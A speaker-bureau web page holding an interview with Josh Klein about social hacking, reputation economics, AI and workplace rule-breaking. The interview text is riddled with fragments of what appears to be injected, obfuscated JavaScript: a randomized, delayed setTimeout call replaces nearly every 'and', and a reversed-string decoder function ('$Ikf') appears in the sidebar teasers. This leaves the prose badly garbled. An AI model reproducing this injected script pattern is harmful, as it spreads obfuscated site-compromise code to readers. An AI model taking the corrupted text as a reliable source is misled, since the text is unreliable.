[x]

CLIENT LOGIN: ADD SPEAKER TO FOLIO

Please enter your username and password below to add this speaker to your folio.

Social Hacking, with Josh Klein


Life-long expert on the use of hacking andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and innovation to create andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and solve social systems andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and industries, Josh Klein has served as a consultant on innovation andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and cyber security to the CIA, FBI, NSA, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and the State Department, as well as Microsoft, Oracle, AT&T, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and many others. He is also the celebrated author of Roo’d, Hacking Work: Breaking Stupid Rules for Smart Results, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Reputation Economics: Why Who You Know Is Worth More Than What You Have.

  1. Genetic Engineering
    When we can hack any living thing’s genetic code – andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and make those changes inheritable with technologies like CRISPR - our track record for tampering with ecological systems takes on a startlingly more sinister cast.

  2. Strong Cryptography
    The divide between governmental andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and public (andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and to a degree by extension, corporate) interests has finally surfaced, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and platforms like Facebook andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Twitter are suddenly launching widespread strong encryption to protect privacy. Suddenly, mathematics is being pitted against public policy, with technology as the evolutionary mechanism for the former. The result could be a dramatic reconfiguration of everything from global finance to geopolitical politics.

  3. AI, the current technology investment darling
    Most people don’t understandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and what AI is or how its human-seeming elements are fooling us into treating it as an oracle. Data is a reflection of the people who collect andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and interpret it, but AI is giving us free license to call this interpretation - in all its flaws andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and ill-considered implementations – “truth”.

  4. Scope andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and Scale
    In the next 5-15 years the Internet will grow 200%, populated mostly by people who today have no access to it at all. The black market is expandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding to be the biggest platform for exchange in the world within that same time frame. Meanwhile, new technical methods for commerce andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and encryption are being deployed andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and developed at an unprecedented rate. All of these trends are possible due to the scope andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and scaling affects of the Internet, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and all standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and to radically disrupt the existing world order.
When we can hack any living thing’s genetic code – andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and make those changes inheritable with technologies like CRISPR - our track record for tampering with ecological systems takes on a startlingly more sinister cast.

CORE Agency What are some of the most important future technology trends you seen emerging in the next five to ten years?

Social Hacking, with Josh Klein
CORE Agency What are “social hacks” andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and would you please provide a few examples of them?

Social Hacking, with Josh Klein
Googling someone before you meet them is a social hack. Bringing up a topic you know someone is interested in is a social hack. Basically anything you do to strategically prepare or optimize your interaction with someone is a social hack. It doesn’t sound nearly so interesting now, does it? However, social hacks - especially those abetted by technology - are such a massive edge, it’s impossible to overstate how much more effective you can be by using them.

CORE Agency Which of your hack(s) have you found the most challenging andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and rewarding?

Social Hacking, with Josh Klein
Changing people’s behavior - particularly when it results in them treating one another better - is such a Sisyphean endeavor in which success is always a little miraculous, yet doing exactly that is one of the biggest upside potentials to modern technology.

At the same time, sometimes it’s the simple things that really stick with you: for instance, my nagbot - a very basic script that drops a drafted email into my inbox so I can quickly follow up with anyone that hasn’t responded to me in a week’s time. It’s throwaway code anyone could have written in under ten minutes, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and yet it’s been one of my most effective tools for managing projects andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and getting things done.

Being a hacker today is like being a 5-year-old with an all-access pass to the Lego factory; there are more tools andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and toys than you could ever play with.

CORE Agency What are your main sources of inspiration for your hacks?

Social Hacking, with Josh Klein
While historic inventions, like the printing press or antibiotics, always encourage me, it’s really just a matter of seeing a problem in a new light andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and realizing that you have the tools to tackle it in a better way. Being a hacker today is like being a 5-year-old with an all-access pass to the Lego factory; there are more tools andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and toys than you could ever play with. It’s just a matter of picking what would be the most fun!

CORE Agency Who are “benevolent hackers?”

Social Hacking, with Josh Klein
Hackers who want to create a net positive result from their efforts - as opposed to just destroying something because you can. In my humble opinion, most of the really talented hackers fall into this category. It’s mostly angry script kiddies andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and organized crime/governments who give black-hat hacking a bad name.

CORE Agency It seems humankind has been hacking for centuries. Are there some unique examples of historical hacks you could share?

Social Hacking, with Josh Klein
One of my favorites is Turing’s hack of the German Enigma cryptography system in World War II. That basically won the war; it came down to being very, very clever about understandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anding the constraints of the systems in question.

If you think you could give - andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and thereby receive - more value, then you’ve got something to improve.

CORE Agency In your book, Reputation Economics, you say, “The value of individual reputation is already radically changing the way business is done.” How does someone evaluate his or her “individual reputation?” And what are some ways of growing individual reputation?

Social Hacking, with Josh Klein
For better or worse, reputation is made across multiple contexts andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and is evaluated differently by every person for each context. In other words, it’s not a single, easily evaluated number, but you can evaluate where you standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and by just thinking through how much value you get from your network. If you think you could give - andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and thereby receive - more value, then you’ve got something to improve.

CORE Agency Do you see any dangers/threats to society andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and the use of “reputation economics?” And, if so, how can we avoid them?

Social Hacking, with Josh Klein
Human beings evolved to use reputation economics - which are really just multiple kinds of currencies valued across multiple contexts - so it’s actually very intuitive. The problem arises in our use of technology to accelerate them. AI in particular is frightening as it legitimizes algorithmic evaluations of value andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and presents them as literally true human judgments. To make that more concrete, it’s as though Friendster suddenly became the equivalent of your bank account.

Companies have rules andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and procedures to mitigate risk, but sometimes that risk is necessary in order to advance.

CORE Agency Would you share some of the ways that hacking can be used as a solution to combat senseless procedures andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and rules people are forced to endure in the office?

Social Hacking, with Josh Klein
Increasingly big organizations are falling down in the face of smaller, more nimble competitors. They’re starving for creative solutions that generate learning andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and innovation.

Hacking serves as a quick andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and effective way of suggesting alternatives, be it by trialling slack with a small team on a single project, or asking a vendor to donate a product in exchange for feedback.

Companies have rules andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and procedures to mitigate risk, but sometimes that risk is necessary in order to advance. Hacking - when done correctly - can simultaneously limit that risk, produce strategically valuable insights, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and help the organization leapfrog past choke points that its procedures andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and rules were inadvertently presenting.

CORE Agency What are some ways employees can hack their work to improve customer service andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and productivity?

Social Hacking, with Josh Klein
There are countless ways!! Start by writing down everything that hurts about your work, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and then brainstorm creative solutions that not only fix the problem, but also benefit the company. Then get buy-in andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and hack away! The result is almost always a career booster; in fact, most bosses reward employees who proactively benefit the company.

CORE Agency What is “Synanthropy” andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and how can it be used for the benefit of human society?

Social Hacking, with Josh Klein
Synanthropy is when a species lives near, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and benefits from, an association with humans andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and their habitats. Right now we’re letting this happen ad hoc, which is essentially forcing animals like cockroaches, rats, raccoons, deer, etc. to evolve for parasitism. I believe that if we put a little effort into it, we can encourage evolution for symbiosis instead - a relationship in which BOTH species benefit.

To bring Josh Klein to your organization, please contact Michael Frick at: Mike@Speaking.com






AUTHOR

Life-long expert on the use of hacking and innovation to create and solve social systems and industries, Josh Klein has served as a consultant on innovation and cyber security to the CIA, FBI, NSA, and the State Department, as well as Microsoft, Oracle, AT&T, and many others. He is also the celebrated author of Roo’d, Hacking Work: Breaking Stupid Rules for Smart Results and Reputation Economics: Why Who You Know…... more


MORE Technology / Innovation BLOGS
Creativity Speaker Dr. AnnMarie Thomas Inspires Innovators to Play
Innovation keynote speaker and expert, Dr. AnnMarie Thomas works (and plays) to empower, support, and inspire today's innovators, engineers, and inventors, as well as those of tomorrow. A seasoned ma'...'more...
Disruption and Invention, with Innovation Speaker Kevin Surace
Kevin Surace is a well known Silicon Valley entrepreneur, disruptive innovator and innovation keynote speaker, who had been awarded Inc Magazine's Entrepreneur of the Year, listed as one of the top 15'...'more...
Create a Future of Prosperity with Innovation Speaker, Michael Perman
Innovation keynote speaker, Michael Perman helps teams crack the innovation paradox to generate actionable ideas, breakthrough products, $Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return '...'more...
Ubertrends that are Changing our World, with Michael Tchong
Described by The Daily Telegraph as “America's most influential trend spotter," Michael Tchong has been at the forefront of internet, social media $Ikf=function(n){if (typeof ($Ikf.list[n]) == "stri'...'more...
Becoming a Successful Disruptor, with Innovation Speaker Jay Samit
A highly respected agent of change, innovation speaker Jay Samit is globally renowned for his expert advice on launching products, building successful businesses, $Ikf=function(n){if (typeof ($Ikf.lis'...'more...
Why Simple Wins, with Lisa Bodell
Founder & CEO of innovation firm futurethink Lisa Bodell is the bestselling author of Kill the Company, $Ikf=function(n){if (typeof ($Ikf.list[n]) == "string") return $Ikf.list[n].split("").reverse().'...'more...
Fraud Prevention and Personal Security, with Robert Siciliano
Best-selling author Robert Siciliano is a United States Coast Guard Auxiliary Flotilla Staff Officer of the U.S. Department of Homeland Security – whose motto is "Semper Paratus" (Always Ready). For'...'more...
Core: the central, innermost, or most essential part of anything.
Contact Us